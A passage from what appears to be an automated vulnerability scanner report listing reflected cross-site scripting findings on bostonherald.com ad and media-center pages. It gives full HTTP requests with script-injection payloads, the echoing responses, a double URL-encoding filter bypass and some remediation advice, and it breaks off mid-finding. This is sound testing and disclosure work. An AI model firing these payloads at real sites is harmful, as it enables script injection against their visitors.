HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2148
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0!x14">
...[SNIP]...

2.13. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2d1"><script>alert(1)</script>6c821273efd was submitted in the companion parameter. This input was echoed as bc2d1\"><script>alert(1)</script>6c821273efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1"><script>alert(1)</script>6c821273efd&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1\"><script>alert(1)</script>6c821273efd!x14">
...[SNIP]...

2.14. http://www.bostonherald.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea775"><script>alert(1)</script>9030106f1a6 was submitted in the page parameter. This input was echoed as ea775\"><script>alert(1)</script>9030106f1a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomeea775"><script>alert(1)</script>9030106f1a6 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/homeea775\"><script>alert(1)</script>9030106f1a6@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

2.15. http://www.bostonherald.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37376%2527%253balert%25281%2529%252f%252fe6f611bda68 was submitted in the page parameter. This input was echoed as 37376';alert(1)//e6f611bda68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome37376%2527%253balert%25281%2529%252f%252fe6f611bda68 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2016
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home37376';alert(1)//e6f611bda68@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

2.16. http://www.bostonherald.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7107c</script><script>alert(1)</script>2ef88115157 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=x147107c</script><script>alert(1)</script>2ef88115157&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2143
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
LING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x147107c</script><script>alert(1)</script>2ef88115157">
...[SNIP]...

2.17. http://www.bostonherald.com/includes/processAds.bg [position parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b75"><script>alert(1)</script>72445af01e was submitted in the position parameter. This input was echoed as a6b75\"><script>alert(1)</script>72445af01e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14a6b75"><script>alert(1)</script>72445af01e&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2101
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14a6b75\"><script>alert(1)</script>72445af01e">
...[SNIP]...

2.18. http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b77b'-alert(1)-'44e32132f58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/?7b77b'-alert(1)-'44e32132f58=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = '7b77b'-alert(1)-'44e32132f58=1'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[key] = val;
                   
                   // Show loadi
...[SNIP]...

2.19. http://www.bostonherald.com/mediacenter/video.php [bc_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the bc_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ff3"><script>alert(1)</script>0e6ae86ba81 was submitted in the bc_id parameter. This input was echoed as 59ff3\"><script>alert(1)</script>0e6ae86ba81 in the application's response. As with the processAds.bg findings, the backslash the application adds before the quotation mark does not stop an HTML parser from closing the attribute there, so this escaping is ineffective in attribute context.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=76678385900159ff3"><script>alert(1)</script>0e6ae86ba81&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<object id="myExperience76678385900159ff3\"><script>alert(1)</script>0e6ae86ba81" class="BrightcoveExperience">
...[SNIP]...

2.20. http://www.bostonherald.com/mediacenter/video.php [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d42"><script>alert(1)</script>dad1887e031 was submitted in the height parameter. This input was echoed as e6d42\"><script>alert(1)</script>dad1887e031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300e6d42"><script>alert(1)</script>dad1887e031&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<param name="height" value="300e6d42\"><script>alert(1)</script>dad1887e031" />
...[SNIP]...

2.21. http://www.bostonherald.com/mediacenter/video.php [media_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da509</script><script>alert(1)</script>08312a85049 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024da509</script><script>alert(1)</script>08312a85049&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
se");

    tmObj.set("VideoURL", "http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024da509</script><script>alert(1)</script>08312a85049");
tmObj.set("VideoTitle", "Sidewalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_pla
...[SNIP]...

2.22. http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 521f5</script><script>alert(1)</script>224f4942aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Side/521f5</script><script>alert(1)</script>224f4942aaawalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2640
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Side/521f5</script><script>alert(1)</script>224f4942aaawalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageUR
...[SNIP]...

2.23. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73056</script><script>alert(1)</script>1e86b062507 was submitted in the program_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2689
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
ia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
       
           
           tmObj.start('4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507'); // Set in Acudeo Console
           
           // 49ee2ce0476b3 -- incl bottom companion ad
</script>
...[SNIP]...

2.24. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc846"><script>alert(1)</script>a2e44a869d6 was submitted in the program_id parameter. This input was echoed as cc846\"><script>alert(1)</script>a2e44a869d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269cc846"><script>alert(1)</script>a2e44a869d6&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2677
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269cc846\"><script>alert(1)</script>a2e44a869d6_p.js">
...[SNIP]...

2.25. http://www.bostonherald.com/mediacenter/video.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

